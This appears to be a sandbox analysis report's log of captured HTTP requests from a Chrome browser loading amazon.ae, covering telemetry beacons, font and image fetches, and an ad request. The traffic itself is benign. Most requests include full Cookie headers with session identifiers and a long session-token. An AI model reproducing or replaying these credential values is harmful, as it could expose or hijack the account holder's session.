Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AstartVL%26pc%3D41612%26at%3D41612%26t%3D1723469044610%26csmtags%3DstartVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41611 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /images/S/sash/pDxWAF1pBB0dzGB.woff2 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/KFPk-9IF4FqAqY-.woff2 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/ydDD9hnRfziI$y7.png HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/WOnTLzkiaEccV7F.woff2 HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.amazon.aesec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/sash/-NcRiM84u1IwoUa.gif HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://m.media-amazon.com/images/I/11EIQ5IGqaL._RC%7C01e5ncglxyL.css,01lF2n-pPaL.css,412sHz-V95L.css,3137XxvMS8L.css,01GZEvC5WIL.css,11GEPqXartL.css,01qPl4hxayL.css,01ti0q+221L.css,413Vvv3GONL.css,11TIuySqr6L.css,01Rw4F+QU6L.css,115C34M4eKL.css,01DwiCRvNnL.css,01IdKcBuAdL.css,01dRHIoUjnL.css,21PrVsc9jNL.css,01oDR3IULNL.css,51nGGGD9eHL.css,01XPHJk60-L.css,11vQ-WiqGQL.css,01QhqFH8I8L.css,21Ol27dM9tL.css,11JRZ3s9niL.css,21wA+jAxKjL.css,112NH+U6IxL.css,218hqIz39PL.css,01CFUgsA-YL.css,31Q6Yb4SLEL.css,116t+WD27UL.css,11uWFHlOmWL.css,11iezfFGyHL.css,11otOAnaYoL.css,01iEw2pcRVL.css,01X+Gu6WK9L.css,21L02xAJfDL.css,116NcDlHDOL.css,012f1fcyibL.css,214tZeCEi5L.css,11F00c3NoYL.css,11hvENnYNUL.css,11FRI-QT39L.css,01890+Vwk8L.css,01864Lq457L.css,01cbS3UK11L.css,21F85am0yFL.css,016mfgi+D2L.css,01WslS8q5ML.css,111YFRAP2PL.css,016Sx2kF1+L.css_.css?AUIClients/AmazonUI&zH5KQLF9Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/S/al-eu-726f4d26-7fdb/b0920667-ac43-442e-a652-750147a6db82.jpg HTTP/1.1Host: m.media-amazon.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://images-eu.ssl-images-amazon.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /s/iu3?d=amazon.ae&slot=navFooter&a2=01018163eecaf7712c47f919b4fe519c2bd46c2dc95cd92eeb2825c833cd7da6a768&old_oo=0&ts=1723469004166&s=ART4IShklipn4DF0jFH5c9j-o_lVqpVJDsDOZ_ZLQxmn&gdpr_consent=&gdpr_consent_avl=&cb=1723469004166&dcc=t HTTP/1.1Host: aax-eu.amazon-adsystem.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ad-id=A8HR2-Z3KU72iOU9MzYQW0U|t
Source: global trafficHTTP traffic detected: GET /af/feedback-link?pl=%7B%22adPlacementMetaData%22%3A%7B%22adElementId%22%3A%22ape_Gateway_right-7_desktop_placement%22%2C%22pageType%22%3A%22Gateway%22%2C%22pageUrl%22%3A%22aHR0cHM6Ly93d3cuYW1hem9uLmFlL3JlZj1uYXZfbG9nbz8%3D%22%2C%22slotName%22%3A%22right-7%22%7D%2C%22adCreativeMetaData%22%3A%7B%22adProgramId%22%3A%221001%22%2C%22adCreativeTemplateName%22%3A%22Image%22%2C%22adImpressionId%22%3A%22https%3A%2F%2Faax-eu.amazon.ae%2Fe%2Fxsp%2Fimp%3Fb%3DRFkzQI2guRRdvhzwTi0UrnUAAAGRRsKdjwMAAAIGAQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICDWTnfk%22%2C%22adCreativeId%22%3A%22579371395698106697%22%2C%22adId%22%3A%22588415379169131844%22%2C%22adCreativeDetails%22%3A%5B%5D%2C%22adNetwork%22%3A%22cs%22%7D%7D HTTP/1.1Host: www.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"device-memory: 8rtt: 250sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-viewport-width: 1280sec-ch-device-memory: 8viewport-width: 1280sec-ch-ua-platform-version: "10.0.0"dpr: 1downlink: 1.25sec-ch-dpr: 1ect: 3gsec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.amazon.ae/ref=nav_logoAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK; csm-hit=adb:adblk_no&t:1723469047006&tb:s-JZJKZTDKNV2CKC82BW2M|1723469046283
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Avl100%26vl100%3D40564%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3AendVL%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26csmtags%3DendVL%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/events/com.amazon.csm.csa.prod HTTP/1.1Host: unagi.amazon.aeConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Asi%26si%3D34810%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41612 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fat%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26m%3D1%26sc%3Dcsa%3Aatfsi%26atfsi%3D34810%26pc%3D41613%26at%3D41613%26t%3D1723469044611%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41613 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
Source: global trafficHTTP traffic detected: GET /1/batch/1/OP/A2VIGQ35RCS4UG:262-5692979-3003613:C37SFEY0GDXEZ5HDEVRN$uedata=s:%2Frd%2Fuedata%3Fld%26v%3D0.294992.0%26id%3DC37SFEY0GDXEZ5HDEVRN%26sw%3D1280%26sh%3D1024%26vw%3D1263%26vh%3D907%26m%3D1%26sc%3DC37SFEY0GDXEZ5HDEVRN%26ue%3D6%26bb%3D1312%26ns%3D1335%26ne%3D1376%26be%3D1599%26cf%3D3071%26af%3D8717%26fn%3D8717%26fp%3D17513%26fcp%3D17513%26pc%3D41598%26tc%3D-1188%26na_%3D-1188%26ul_%3D-1723469002998%26_ul%3D-1723469002998%26rd_%3D-1723469002998%26_rd%3D-1723469002998%26fe_%3D-1184%26lk_%3D-1138%26_lk%3D-1138%26co_%3D-1138%26_co%3D-366%26sc_%3D-1097%26rq_%3D-365%26rs_%3D-36%26_rs%3D505%26dl_%3D-28%26di_%3D1807%26de_%3D1807%26_de%3D1807%26_dc%3D41575%26ld_%3D41575%26_ld%3D-1723469002998%26ntd%3D-1%26ty%3D0%26rc%3D0%26hob%3D4%26hoe%3D6%26ld%3D41599%26t%3D1723469044597%26ctb%3D1%26rt%3Dcf%3A14-1-4-7-2-0-1_af%3A44-1-5-33-5-0-1_ld%3A240-9-7-215-7-0-1%26pty%3DGateway%26spty%3Ddesktop%26pti%3Ddesktop%26tid%3DC37SFEY0GDXEZ5HDEVRN%26aftb%3D1%26lob%3D1:41625 HTTP/1.1Host: fls-eu.amazon.aeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.amazon.ae/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
